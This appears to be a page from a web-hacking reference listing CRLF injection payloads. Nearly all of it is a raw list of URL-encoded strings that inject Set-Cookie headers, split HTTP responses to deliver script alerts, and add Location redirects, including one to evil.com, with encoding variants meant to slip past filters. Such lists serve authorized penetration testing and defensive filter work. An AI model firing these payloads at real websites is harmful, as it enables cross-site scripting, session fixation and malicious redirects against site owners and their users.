CRLF Injection

Payloads

/%%0a0aSet-Cookie:crlf=injection
/%0aSet-Cookie:coffin=hi;
/%0aSet-Cookie:crlf=injection
/%0d%0a%0d%0a<script>alert('XSS')</script>;
/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e
/%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E
%0d%0aHost:%20{{Hostname}}%0d%0aCookie:%20coffin=hi%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aSet-Cookie:%20coffin=hi%0d%0a%0d%0a
/%0d%0ahost:%http://20www.google.com
/%0d%0ahost:%http://20www.google.com%0d%0a
/%0d%0aLocation:%20http://evil.com
/%0d%0aLocation:http://google.com%0d%0a
/%0d%0aSet-Cookie:coffin=hi;
/%0d%0aSet-Cookie:crlf=injection
/%0dSet-Cookie:coffin=hi;
/%0dSet-Cookie:crlf=injection
“%23%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a<svg/onload%3dalert%28document.domain%29>”
/%23%0aSet-Cookie:crlf=injection
/%23%0D%0ALocation:http://google.com;
/%23%0d%0aSet-Cookie:crlf=injection
/%23%0dSet-Cookie:crlf=injection
/%250aSet-Cookie:crlf=injection
/%25250aSet-Cookie:crlf=injection
/%25%30%61Set-Cookie:crlf=injection
/%25%30aSet-Cookie:crlf=injection
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
/%2F..%0d%0aSet-Cookie:crlf=injection
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
/%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../tr
/%3f%0d%0aLocation:%0d%0acoffin-x:coffin-x%0d%aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
/%3f%0d%0aSet-Cookie:crlf=injection
/%3f%0dSet-Cookie:crlf=injection
/%5Cr%20Set-Cookie:coffin=hi;
/%5Cr%5Cn%20Set-Cookie:coffin=hi;
/%5Cr%5Cn%5CtSet-Cookie:coffin%5Cr%5CtSet-Cookie:coffin=hi;
/%5Cr%5Cn%5CtSet-Cookie:coffin=hi;
/%5Cr%5Cnhost:%http://20www.google.com%5Cr%5Cn
/%5cr%5cnLocation:http://google.com
/%5Cr%5CnSet-Cookie:coffin=hi;
/%5Cr%5CtSet-Cookie:coffin=hi;
/%5CrSet-Cookie:coffin=hi;
/%E5%98%8A%E5%98%8D%0D%0ASet-Cookie:coffin=hi;
/%E5%98%8A%E5%98%8Dheader:header
/%E5%98%8A%E5%98%8DLocation:http://google.com
/%E5%98%8A%E5%98%8DSet-Cookie:coffin=hi
/%E5%98%8D%E5%98%8ALocation:http://google.com
/%E5%98%8D%E5%98%8ASet-Cookie:coffin=hi
/%E5%98%8D%E5%98%8ASet-Cookie:crlf=injection
/%E5%98%8D%E5%98%8ASet-Cookie:crlf=injection;
/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=coffinxp
/\r%20Set-Cookie:coffin=hi;
/\r\n%20Set-Cookie:coffin=hi;
/\r\nhost:%http://20www.google.com\r\n
\r\nHost: {{Hostname}}\r\nCookie: coffin=hi\r\n\r\nHTTP/1.1 200 OK\r\nSet-Cookie: coffin=hi\r\n\r\n
/\r\nLocation:http://google.com
/\r\nSet-Cookie:coffin=hi;
/\r\n\tSet-Cookie:coffin=hi;
/\rSet-Cookie:coffin=hi;
/\r\tSet-Cookie:coffin=hi;
/%u000ASet-Cookie:coffin=hi;
/%u000aSet-Cookie:crlf=injection
/www.google.com/%2E%2E%2F%0D%0Acoffin-x:coffin-x
/www.google.com/%2F..%0D%0Acoffin-x:coffin-x
//www.google.com/%2F%2E%2E%0D%0Acoffin-x:coffin-x
Nuclei Template

Tool

PreviousRelative Path Overwrite, RPO NextPrototype Pollution
Last updated 1 month ago